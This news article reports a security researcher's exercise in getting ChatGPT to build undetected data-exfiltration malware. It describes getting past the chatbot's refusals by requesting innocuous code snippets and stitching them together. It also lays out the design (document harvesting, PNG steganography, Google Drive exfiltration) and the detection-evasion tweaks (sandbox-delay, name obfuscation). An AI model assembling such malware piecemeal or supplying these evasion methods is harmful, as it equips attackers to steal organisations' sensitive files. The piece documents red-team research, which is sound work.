A Forcepoint security researcher says he used ChatGPT to develop a zero-day exploit that bypassed detections when uploaded to VirusTotal.
This means that these sophisticated and usually very expensive attacks, primarily the possession of nation-states and APT groups, are now a lot more accessible to any would-be cybercriminal with access to the AI – if they can game the engine to do what’s needed.
For this exercise in malware development, Forcepoint’s Aaron Mulgrew, who calls himself a “self-described novice,” didn’t write any code but used advanced techniques including steganography, which embeds files into the code of other file, usually an image. This allows crooks to bypass defense tools and steal sensitive data.
Because the chatbot’s guardrails prevent it from answering any prompt that includes “malware” developing a new exploit does require some creativity, and it took Mulgrew only two attempts to completely evade detection. Mulgrew says producing the attack took “only a few hours.”
“The equivalent time taken without an AI based Chatbot, I would estimate could take a team of 5 – 10 malware developers a few weeks, especially to evade all detection based vendors,” he wrote.
The targets of the theoretical zero-day would be high-value corporate users with high-value documents on the C drive for exfiltration.
Since he couldn’t simply ask ChatGPT to write malware, Mulgrew asked the chatbot to write small snippets that he could manually stitch together, and used steganography for exfiltration. To this end, his first prompt was to ask the AI to generate code that searched for a PNG larger than 5MB on the local disk.
“The design decision here was that a 5MB PNG would easily be large enough to store a fragment of a high value business sensitive document such as a PDF or DOCX,” Mulgrew wrote.
Next, he asked ChatGPT to encode the PNG file with steganography. That worked, too, with the AI calling on Auyer’s Steganographic Library to do the job.
To find the high-value documents to steal, Mulgrew asked the AI to write code that iterates over the User’s Documents, Desktop, and AppData folders and locates any PDF documents or DOCX documents with a maximum size of 1MB — this ensures that the entire document can be embedded into a single image and, hopefully, smuggled out without raising any alarms.
Additionally, Mulgrew says he decided on Google Drive for exfiltration because Google is usually “allow listed” on corporate networks.
“Combing the snippets using a prompt was surprisingly the easiest part, as I simply needed to post the code snippets I had managed to get ChatGPT to generate and combine them together,” he wrote.
However, since most high-value documents with stealing will likely be larger than 1MB, Mulgrew asked ChatGPT to write code to split a PDF into 100KB pieces and generate the phony images accordingly. This took “four or five prompts,” he noted.
The first time Mulgrew uploaded the AI-generted malware to VirusTotal, five vendors flagged the code as malicious. In the interest of bypassing all of the security tools and creating a true zero-day, Mulgrew had to make a couple more tweaks.
First, he asked ChatGPT to create its own LSB steganography function instead of calling the external Auyer’s library. “This dropped the number of detections to two vendors, but not quite the golden number of zero vendors marking the file as malicious,” Mulgrew said.
The remaining two vendors included a “leading sandbox” and one that performs static analysis on executables. To bypass the first, he then asked ChatGPT to delay the start by two minutes — some sandboxes have a built-in timeout. And for the second, he asked the chatbot to change all the variables to random English first and last names, which effectively obfuscates the code.
Again, ChatGPT recognizes commands such as “obfuscate the code to avoid detection” as illegal and unethical, so would-be attackers have to get creative with this one.
After making these changes, Mulgrew once again uploaded the malware to VirusTotal and got the green circle result: zero vendors flagged the file as malicious. ®